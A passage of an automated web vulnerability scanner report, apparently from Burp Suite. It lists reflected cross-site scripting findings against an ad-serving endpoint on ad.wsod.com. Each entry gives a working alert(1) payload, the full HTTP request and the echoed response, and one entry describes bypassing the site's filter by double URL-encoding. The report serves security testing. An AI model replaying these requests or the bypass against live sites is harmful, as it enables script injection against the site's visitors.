<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357a1037";alert(1)//320359448bd/477.0.iframe.150x30/1300830342**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14
...[SNIP]...

1.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b7d7%2522%253balert%25281%2529%252f%252fd56f2e4f03f was submitted in the REST URL parameter 3. This input was echoed as 8b7d7";alert(1)//d56f2e4f03f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x308b7d7%2522%253balert%25281%2529%252f%252fd56f2e4f03f/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x308b7d7";alert(1)//d56f2e4f03f/1300830353**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin
...[SNIP]...

1.125. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae77b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc07bf367e was submitted in the REST URL parameter 3. This input was echoed as ae77b"><script>alert(1)</script>cc07bf367e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30ae77b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc07bf367e/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2703

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30ae77b"><script>alert(1)</script>cc07bf367e/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.126. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903c1"><script>alert(1)</script>c509db9ea was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*903c1"><script>alert(1)</script>c509db9ea HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2659

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*903c1"><script>alert(1)</script>c509db9eahttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.127. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db3c2"-alert(1)-"a93a31619 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*db3c2"-alert(1)-"a93a31619 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2629

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*db3c2"-alert(1)-"a93a31619">
...[SNIP]...

1.128. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d85c0"><script>alert(1)</script>789f2fc281d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&d85c0"><script>alert(1)</script>789f2fc281d=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2669

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
i/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&d85c0"><script>alert(1)</script>789f2fc281d=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.129. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e1de"-alert(1)-"d2c3f12913 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&4e1de"-alert(1)-"d2c3f12913=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2637

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
i/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/*&4e1de"-alert(1)-"d2c3f12913=1">
...[SNIP]...

1.130. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [ybt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 639f8</script><script>alert(1)</script>ee2b459cca0 was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319639f8</script><script>alert(1)</script>ee2b459cca0&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830278**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319639f8</script><script>alert(1)</script>ee2b459cca0&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251
...[SNIP]...

1.131. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [yhdata parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7e8a</script><script>alert(1)</script>e533f5769fb was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=f7e8a</script><script>alert(1)</script>e533f5769fb&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:40:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830011**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=f7e8a</script><script>alert(1)</script>e533f5769fb&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW8
...[SNIP]...

1.132. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237 [yyob parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9bdd</script><script>alert(1)</script>98903d590b7 was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.17115531559102237?yhdata=ycg=&yyob=c9bdd</script><script>alert(1)</script>98903d590b7&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15nfpkqui/M=791401.14523143.14352822.2140147/D=fin/S=2142203299:NE3/Y=YAHOO/EXP=1300835451/L=eNGyZ0wNcmBqhH8YTVvEVQM4rcHW802JEFsAA_9l/B=DxcEK0wNPGY-/J=1300828251321631/K=2h7T3fdmBStsXEJ.lFLaCA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-legal-matters;_ylt=Avy6SeQ7msNsv0vs8J.ekvsUaq9_;_ylu=X3oDMTFrMDdham85BHBvcwMxNwRzZWMDbmV3c1NlY29uZGFyeUVsZW1lbnRzTmF2BHNsawNsZWdhbGxhd21hdHQ-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:42:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
